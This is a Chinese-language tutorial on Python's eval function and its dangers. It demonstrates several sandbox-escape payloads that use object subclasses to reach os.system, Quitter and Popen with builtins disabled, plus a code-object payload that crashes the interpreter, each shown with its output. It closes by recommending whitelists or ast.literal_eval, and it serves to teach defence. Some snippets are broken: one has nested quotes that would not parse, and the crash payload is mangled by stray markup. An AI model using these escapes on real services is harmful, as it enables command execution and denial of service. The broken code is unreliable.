python中eval的用法詳解及潛在風險介紹

不言
發布: 2019-03-25 10:41:37
轉載
4827 人瀏覽過

這篇文章帶給大家的內容是關於python中eval的用法詳解及潛在風險介紹,有一定的參考價值,有需要的朋友可以參考一下,希望對你有幫助。

eval前言

In [1]: eval("2+3")
Out[1]: 5

In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
登入後複製

當記憶體中的內建模組含有os的話,eval同樣可以做到指令執行:

In [3]: import os

In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0
登入後複製

當然,eval只能執行Python的表達式類型的程式碼,不能直接用它進行import操作,但exec可以。如果要使用eval進行import,則使用__import__:

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0
登入後複製

在實際的程式碼中,往往有使用客戶端資料帶入eval中執行的需求。例如動態模組的引入,舉個栗子,一個線上爬蟲平台上爬蟲可能有多個並且位於不同的模組中,伺服器端但往往只需要呼叫使用者在客戶端選擇的爬蟲類型,並透過後端的exec或eval進行動態調用,後端編碼實作非常方便。但如果對用戶的請求處理不恰當,就會造成嚴重的安全漏洞。

安全」使用eval

現在提倡最多的就是使用eval的後兩個參數來設定函數的白名單:

Eval函數的宣告為eval(expression[ , globals[, locals]])

其中,第二三個參數分別指定能夠在eval中使用的函數等,如果不指定,預設為globals()和locals()函數中包含的模組和函數。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'os' is not defined
登入後複製

如果指定只允許呼叫abs函數,可以使用下面的寫法:

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
登入後複製

使用這種方法來防護,確實可以起到一定的作用,但是,這種處理方法可能會被繞過,從而造成其他問題!

繞過執行程式碼1

被繞過的情景如下,小明知道了eval會帶來一定的安全風險,所以使用如下的手段去防止eval執行任意程式碼:

env = {}
env["locals"]   = None
env["globals"]  = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
 
eval(users_str, env)
登入後複製

Python中的__builtins__是內建模組,用來設定內建函數的模組。例如熟悉的abs,open等內建函數,都是在該模組中以字典的方式儲存的,下面兩種寫法是等價的:

>>> __builtins__.abs(-20)
20
>>> abs(-20)
20
登入後複製

我們也可以自訂內建函數,並像使用Python中的內建函數一樣使用它們:

>>> def hello():
...     print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi
登入後複製

小明將eval函數的作用域中的內建模組設定為None,好像看起來很徹底了,但依然可以被繞過。__builtins__是__builtin__的一個引用,在__main__模組下,兩者是等價的:

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136
登入後複製

根據烏雲drops提到的方法,使用如下程式碼即可:

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
登入後複製

上面的程式碼首先利用__class__和__subclasses__動態載入了object對象,這是因為eval中無法直接使用object。然後使用object的子類別的zipimporter對egg壓縮檔案中的configobj模組進行導入,並調用其內建模組中的os模組從而實現命令執行,當然,前提是要有configobj的egg檔。configobj模組很意思,居然內建了 os模組:

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0
登入後複製

和configobj 類似的模組如urllib,urllib2,setuptools等都有os的內置,理論上使用哪個都行。如果無法下載egg壓縮文件,可以下載帶有setup.py的資料夾,加入:

from setuptools import setup, find_packages
登入後複製

然後執行:

python setup.py bdist_egg
登入後複製

就可以在dist資料夾中找到對應的egg檔案。繞過demo如下:

>>> env = {}
>>> env["locals"]   = None
>>> env["globals"]  = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0
登入後複製

拒絕服務攻擊1

object的子類別中有很多有趣的東西,執行以下程式碼查看:

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
登入後複製

這裡我就不輸出結果了,如果你執行的話,可以看到很多有趣的模組,像是file,zipimporter,Quitter等。經過測試,file的建構函數是被解釋器沙箱隔離的。簡單的,或者直接使object暴露出的子類Quitter進行退出:

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})
登入後複製

C:/>
如果運氣好,遇到對方程式中導入了os等敏感模組,那麼Popen就可以用,並且繞過__builins__為空的限制,例子如下:

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
 
>>>
正在 Ping 127.0.0.1 具有 32 字节的数据:
来自 127.0.0.1 的回复: 字节=32 时间>>
登入後複製

事實上,這種情況非常多,例如導入os模組,一般用來處理路徑問題。所以說,遇到這種情況,完全可以列舉大量的功能函數,來探測目標object的子類別中是否含有一些危險的函數可以直接使用。

拒絕服務攻擊2

同樣,我們甚至可以繞過__builtins__為None,造成一次拒絕服務攻擊,Payload(來自老外blog)如下:

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})
登入後複製

運行上面的程式碼,Python直接crash掉了,造成拒絕服務攻擊。原理是透過嵌套的lambda來建構一片程式碼段,也就是code物件。為這個code物件分配空的棧,並給出對應的程式碼字串,這裡是KABOOM,在空棧上執行程式碼,會出現crash。構造完成後,呼叫fc函數即可觸發,其思路不可謂不淫蕩。

總結

從上面的內容我們可以看出,單單將內建模組置為空,是不夠的,最好的機制是建構白名單,如果覺得比較麻煩,可以用ast.literal_eval來取代不安全的eval。

這篇文章到這裡就已經全部結束了,更多其他精彩內容可以關注PHP中文網的python影片教學專欄!

#

以上是python中eval的用法詳解及潛在風險介紹的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:segmentfault.com
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
作者最新文章
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!